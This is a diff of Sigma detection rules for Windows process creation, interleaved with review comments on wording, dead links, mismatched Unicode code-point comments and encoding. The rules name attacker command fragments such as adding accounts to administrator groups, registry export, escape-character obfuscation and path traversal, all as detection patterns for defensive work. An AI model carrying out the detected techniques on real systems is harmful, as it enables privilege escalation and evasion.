b/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml index bdf8d31bc..3b6c85f60 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml 
@@ -1,8 +1,7 @@ title: Potential Amazon SSM Agent Hijacking id: d20ee2f4-822c-4827-9e15-41500b1fff10 status: experimental -description: Detects potential Amazon SSM agent hijack attempts as outlined in the - Mitiga research report. +description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. references: - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ @@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \amazon-ssm-agent.exe - CommandLine|contains|all: + CommandLine|contains|all: - '-register ' - '-code ' - '-id ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml index 45f8d718d..9585f3132 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml @@ -1,8 +1,7 @@ title: Execution via stordiag.exe id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34 status: test -description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe - and fltmc.exe +description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe references: - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html - https://twitter.com/eral4m/status/1451112385041911809 @@ -27,7 +26,7 @@ detection: - \systeminfo.exe - \fltmc.exe filter: - ParentImage|startswith: + ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - c:\windows\system32\ - c:\windows\syswow64\ condition: process_creation and (selection and not filter) 
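Review bot: The comment added to `ParentImage|startswith:` in the stordiag filter, `# as first is "Copy c:\windows\system32\stordiag.exe to a folder"`, is hard to parse and does not say what the filter is for. From the hunk, the filter drops events whose parent stordiag.exe runs from the system directories, so only a copy placed elsewhere is reported; a clearer wording would be `# The technique first copies stordiag.exe out of System32, so only parents outside the system directories are of interest`. The rest of the hunk is indentation only.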
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml index 167dd71b7..2457c7958 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml @@ -1,9 +1,7 @@ title: Start of NT Virtual DOS Machine id: 16905e21-66ee-42fe-b256-1318ada2d770 status: test -description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit - Windows operating systems, as well as the execution of both 16-bit and 32-bit - DOS applications +description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications references: - https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support - https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7 diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml index bec8fc8b5..cdb427691 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml 
@@ -28,20 +28,20 @@ detection: - \wininit.exe - \spoolsv.exe - \searchindexer.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe filter: - CommandLine|contains|all: + CommandLine|contains|all: - ' route ' - ' ADD ' condition: process_creation and (all of selection_* and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml index a8c70c71e..02a2a7c9b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml @@ -1,11 +1,10 @@ title: Add User to Local Administrators Group id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 related: - - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e - type: similar + - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups + type: similar status: test -description: Detects suspicious command line that adds an account to the local administrators/administrateurs - group +description: Detects suspicious command line that adds an account to the local administrators/administrateurs group references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 
@@ -23,16 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + # net.exe + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + # powershell.exe + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - ' administrators ' - - ' administrateur' + - ' administrateur' # Typo without an 'S' so we catch both condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml index 59b71999d..57b950218 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml @@ -1,11 +1,10 @@ title: Suspicious Add User to Remote Desktop Users Group id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e related: - - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 - type: similar + - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups + type: similar status: test -description: Detects suspicious command line in which a user gets added to the local - Remote Desktop Users group +description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group references: - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ author: Florian Roth (Nextron Systems) 
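Review bot: The new comment on the French group value, `# Typo without an 'S' so we catch both`, describes a deliberate choice as a typo, which invites a future "fix" that would narrow the match. The value `' administrateur'` is intentionally truncated so that a `contains` match covers both "administrateur" and "administrateurs"; suggest `# Intentionally truncated: matches both "administrateur" and "administrateurs"`. The `# net.exe` / `# powershell.exe` labels on the two `selection_main` alternatives are helpful as added.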
@@ -26,17 +25,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml index 39847fe7a..e9fc693df 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml @@ -1,8 +1,7 @@ title: Execute From Alternate Data Streams id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c status: test -description: Detects execution from an Alternate Data Stream (ADS). Adversaries may - use NTFS file attributes to hide their malicious data in order to evade detection +description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md author: frack113 
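Review bot: The French group name changes from the double-quoted scalar `"Utilisateurs du Bureau \xE0 distance"` to a plain scalar with a literal `à`; both decode to the same string, so the match itself is unchanged, but the rule file now has to be read as UTF-8 — a loader that decodes it as a single-byte code page would produce a different string and the French variant would silently stop matching. Since this is the only non-ASCII byte in the hunk, it would be worth having whatever lint or CI step the repo runs on rules check that the file is valid UTF-8, or keeping the escaped form. The added language comments on the French and Spanish entries are useful as written.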
@@ -20,25 +19,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_stream: - CommandLine|contains: 'txt:' + CommandLine|contains: 'txt:' selection_tools_type: - CommandLine|contains|all: + CommandLine|contains|all: - 'type ' - ' > ' selection_tools_makecab: - CommandLine|contains|all: + CommandLine|contains|all: - 'makecab ' - .cab selection_tools_reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - ' export ' selection_tools_regedit: - CommandLine|contains|all: + CommandLine|contains|all: - 'regedit ' - ' /E ' selection_tools_esentutl: - CommandLine|contains|all: + CommandLine|contains|all: - 'esentutl ' - ' /y ' - ' /d ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml index 22c30101b..ff34c516c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml @@ -1,8 +1,7 @@ title: Always Install Elevated Windows Installer id: cd951fdc-4b2f-47f5-ba99-a33bf61e3770 status: experimental -description: Detects Windows Installer service (msiexec.exe) trying to install MSI - packages with SYSTEM privilege +description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_image_1: 
@@ -34,8 +33,8 @@ detection: filter_installer: ParentImage: C:\Windows\System32\services.exe filter_repair: - - CommandLine|endswith: \system32\msiexec.exe /V - - ParentCommandLine|endswith: \system32\msiexec.exe /V + - CommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" + - ParentCommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" filter_sophos: ParentImage|startswith: C:\ProgramData\Sophos\ filter_avira: @@ -48,8 +47,7 @@ detection: ParentImage|startswith: - C:\Program Files\Google\Update\ - C:\Program Files (x86)\Google\Update\ - condition: process_creation and (1 of selection_image_* and selection_user and - not 1 of filter_*) + condition: process_creation and (1 of selection_image_* and selection_user and not 1 of filter_*) falsepositives: - System administrator usage - Anti virus products diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml index 2b5cc6007..65365f8fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Windows App Activity id: f91ed517-a6ba-471d-9910-b3b4a398c0f3 status: experimental -description: Detects potentially suspicious child process of applications launched - from inside the WindowsApps directory. This could be a sign of a rogue ".appx" - package installation/execution +description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution references: - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ 
@@ -21,9 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_parent: + # GrandParentImage|endswith: '\sihost.exe' ParentImage|contains: C:\Program Files\WindowsApps\ selection_susp_img: Image|endswith: + # You can add more LOLBINs - \cmd.exe - \cscript.exe - \mshta.exe @@ -33,19 +33,20 @@ detection: - \rundll32.exe - \wscript.exe selection_susp_cli: - CommandLine|contains: + # You can add more potentially suspicious keywords + CommandLine|contains: - cmd /c - Invoke- - Base64 filter_optional_terminal: ParentImage|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal ParentImage|endswith: \WindowsTerminal.exe + # Note: to avoid FP add the default shells and profiles that your WT integrates Image|endswith: - \powershell.exe - \cmd.exe - \pwsh.exe - condition: process_creation and (selection_parent and 1 of selection_susp_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Legitimate packages that make use of external binaries such as Windows Terminal level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml index c230f0b37..4547d9538 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml 
@@ -1,9 +1,7 @@ title: Arbitrary Shell Command Execution Via Settingcontent-Ms id: 24de4f3b-804c-4165-b442-5a06a2302c7e status: test -description: The .SettingContent-ms file type was introduced in Windows 10 and allows - a user to create "shortcuts" to various Windows 10 setting pages. These files - are simply XML and contain paths to various Windows 10 settings binaries. +description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 author: Sreeman @@ -23,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: .SettingContent-ms + CommandLine|contains: .SettingContent-ms filter: - CommandLine|contains: immersivecontrolpanel + CommandLine|contains: immersivecontrolpanel condition: process_creation and (selection and not filter) fields: - ParentProcess diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml index 1ad3e7984..60b104dca 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml 
@@ -1,10 +1,7 @@ title: Phishing Pattern ISO in Archive id: fcdf69e5-a3d3-452a-9724-26f2308bf2b1 status: test -description: Detects cases in which an ISO files is opend within an archiver like - 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files - in archives as email attachments to bypass certain filters and protective measures - (mark of web) +description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) references: - https://twitter.com/1ZRR4H/status/1534259727059787783 - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/ @@ -32,7 +29,6 @@ detection: - \ImgBurn.exe condition: process_creation and selection falsepositives: - - Legitimate cases in which archives contain ISO or IMG files and the user opens - the archive and the image via clicking and not extraction + - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml index 6c653c7d6..8f510dab3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml 
@@ -1,8 +1,7 @@ title: Automated Collection Command Prompt id: f576a613-2392-4067-9d1a-9345fb58d8d1 status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_ext: - CommandLine|contains: + CommandLine|contains: - .doc - .docx - .xls @@ -34,13 +33,13 @@ detection: - .pdf - .txt selection_other_dir: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /b ' - ' /s ' selection_other_findstr: OriginalFileName: FINDSTR.EXE - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /si ' condition: process_creation and (selection_ext and 1 of selection_other_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml index 233424d91..5e92b07eb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml 
@@ -1,19 +1,13 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 related: - - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add - type: obsoletes + - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add + type: obsoletes status: experimental -description: 'Detects attackers using tooling with bad opsec defaults. - - E.g. spawning a sacrificial process to inject a capability into the process without - taking into account how the process is normally run. - - One trivial example of this is using rundll32.exe without arguments as a sacrificial - process (default in CS, now highlighted by c2lint), running WerFault without arguments - (Kraken - credit am0nsec), and other examples. - - ' +description: | + Detects attackers using tooling with bad opsec defaults. + E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. + One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec @@ -22,8 +16,7 @@ references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback -author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron - Systems), Christian Burkard (Nextron Systems) +author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) date: 2020/10/23 modified: 2023/12/02 tags: 
@@ -39,33 +32,33 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_werfault: Image|endswith: \WerFault.exe - CommandLine|endswith: WerFault.exe + CommandLine|endswith: WerFault.exe selection_rundll32: Image|endswith: \rundll32.exe - CommandLine|endswith: rundll32.exe + CommandLine|endswith: rundll32.exe selection_regsvcs: Image|endswith: \regsvcs.exe - CommandLine|endswith: regsvcs.exe + CommandLine|endswith: regsvcs.exe selection_regasm: Image|endswith: \regasm.exe - CommandLine|endswith: regasm.exe + CommandLine|endswith: regasm.exe selection_regsvr32: Image|endswith: \regsvr32.exe - CommandLine|endswith: regsvr32.exe + CommandLine|endswith: regsvr32.exe filter_main_edge_update: ParentImage|contains|all: - :\Users\ - \AppData\Local\Microsoft\EdgeUpdate\Install\{ filter_optional_chrome_installer: + # As reported in https://github.com/SigmaHQ/sigma/issues/4570 ParentImage|contains|all: - :\Users\ - \AppData\Local\Google\Chrome\Application\ ParentImage|endswith: \Installer\setup.exe ParentCommandLine|contains: --uninstall --channel=stable Image|endswith: \rundll32.exe - CommandLine|endswith: rundll32.exe - condition: process_creation and (1 of selection_* and not 1 of filter_main_* and - not 1 of filter_optional_*) + CommandLine|endswith: rundll32.exe + condition: process_creation and (1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unlikely level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml index 79172932f..5538eee95 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml 
@@ -1,15 +1,13 @@ title: Suspicious Child Process Created as System id: 590a5f4c-6c8c-4f10-8307-89afe9453a9d status: test -description: Detection of child processes spawned with SYSTEM privileges by parents - with LOCAL SERVICE or NETWORK SERVICE accounts +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://github.com/antonioCoco/RogueWinRM - https://twitter.com/Cyb3rWard0g/status/1453123054243024897 -author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research - (OTR) +author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) date: 2019/10/26 modified: 2022/12/15 tags: @@ -31,17 +29,17 @@ detection: ParentUser|endswith: - \NETWORK SERVICE - \LOCAL SERVICE - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI - User|endswith: + User|endswith: # System - \SYSTEM - - "\\Syst\xE8me" - - "\\\u0421\u0418\u0421\u0422\u0415\u041C\u0410" + - \Système + - \СИСТЕМА IntegrityLevel: System filter_rundll32: Image|endswith: \rundll32.exe - CommandLine|contains: DavSetCookie + CommandLine|contains: DavSetCookie condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml index 5cd9f3718..279d28b02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml 
@@ -4,8 +4,8 @@ status: test description: Detects potential commandline obfuscation using known escape characters references: - https://twitter.com/vysecurity/status/885545634958385153 - - https://twitter.com/Hexacorn/status/885553465417756673 - - https://twitter.com/Hexacorn/status/885570278637678592 + - https://twitter.com/Hexacorn/status/885553465417756673 # Dead link + - https://twitter.com/Hexacorn/status/885570278637678592 # Dead link - https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques - https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ author: juju4 @@ -23,7 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # - # no TAB modifier in sigmac yet, so this matches (or TAB in elasticsearch backends without DSL queries) - h^t^t^p - h"t"t"p condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml index deaa284c6..d6756f738 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml 
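Review bot: The two Hexacorn entries in `references` are now annotated `# Dead link` but left in place, while the windowsinspired.com entry a few lines below in the same list already uses a `https://web.archive.org/web/...` snapshot. Flagging a reference as dead without replacing it leaves readers with nothing to verify the rule's rationale against; either substitute archived copies of the two tweets in the same web.archive.org form or remove them. The `# - # no TAB modifier in sigmac yet ...` line inside `selection` looks like a disabled list item rather than a note, so it would be clearer as `# TAB-based escaping is not covered here: no TAB modifier in sigmac yet`.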
@@ -1,16 +1,12 @@ title: Potential Commandline Obfuscation Using Unicode Characters id: e0552b19-5a83-4222-b141-b36184bb8d79 related: - - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 - type: obsoletes + - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 + type: obsoletes status: test -description: 'Detects potential commandline obfuscation using unicode characters. - - Adversaries may attempt to make an executable or file difficult to discover or - analyze by encrypting, encoding, or otherwise obfuscating its contents on the - system or in transit. - - ' +description: | + Detects potential commandline obfuscation using unicode characters. + Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http 
@@ -29,27 +25,27 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 selection_other: - CommandLine|contains: - - "\xE2" - - "\u20AC" - - "\xA3" - - "\xAF" - - "\xAE" - - "\xB5" - - "\xB6" + CommandLine|contains: + - â + - € + - £ + - ¯ + - ® + - µ + - ¶ condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml index 6521dac38..ca5c1df1b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml @@ -1,8 +1,7 @@ title: Potential Command Line Path Traversal Evasion Attempt id: 1327381e-6ab0-4f38-b583-4c1b8346a56b status: experimental -description: Detects potential evasion or obfuscation attempts using bogus path traversal - via the commandline +description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline references: - https://twitter.com/hexacorn/status/1448037865435320323 - https://twitter.com/Gal_B1t/status/1062971006078345217 
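Review bot: The code-point comments added to `selection_unicode_slashes` do not match the characters they annotate: the removed lines show these values were `\u2215` (division slash) and `\u2044` (fraction slash), but the new comments read `0x22FF` and `0x206F`. Because the literal glyphs are visually indistinguishable from a plain slash, the comment is the only thing a maintainer can check against, so the lines should be `- ∕ # 0x2215` and `- ⁄ # 0x2044`. The other comments in this hunk (0x02E3, 0x02EA, 0x02E2, 0x2015, 0x2014) do agree with the removed escapes. Replacing `\u`/`\x` escapes with raw non-ASCII characters here, in `selection_other`, and in the `\Système`/`\СИСТЕМА` values of proc_creation_win_susp_child_process_as_system_.yml also makes the match depend on the file being read as UTF-8, where the escaped form was encoding-independent; it is worth confirming that the tooling producing and consuming these files pins UTF-8.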
@@ -22,16 +21,16 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_1: Image|contains: \Windows\ - CommandLine|contains: + CommandLine|contains: - \..\Windows\ - \..\System32\ - \..\..\ selection_2: - CommandLine|contains: .exe\..\ + CommandLine|contains: .exe\..\ filter_optional_google_drive: - CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ + CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ filter_optional_citrix: - CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ + CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) falsepositives: - Google Drive diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml index 67cb14416..fc0143ef2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml 
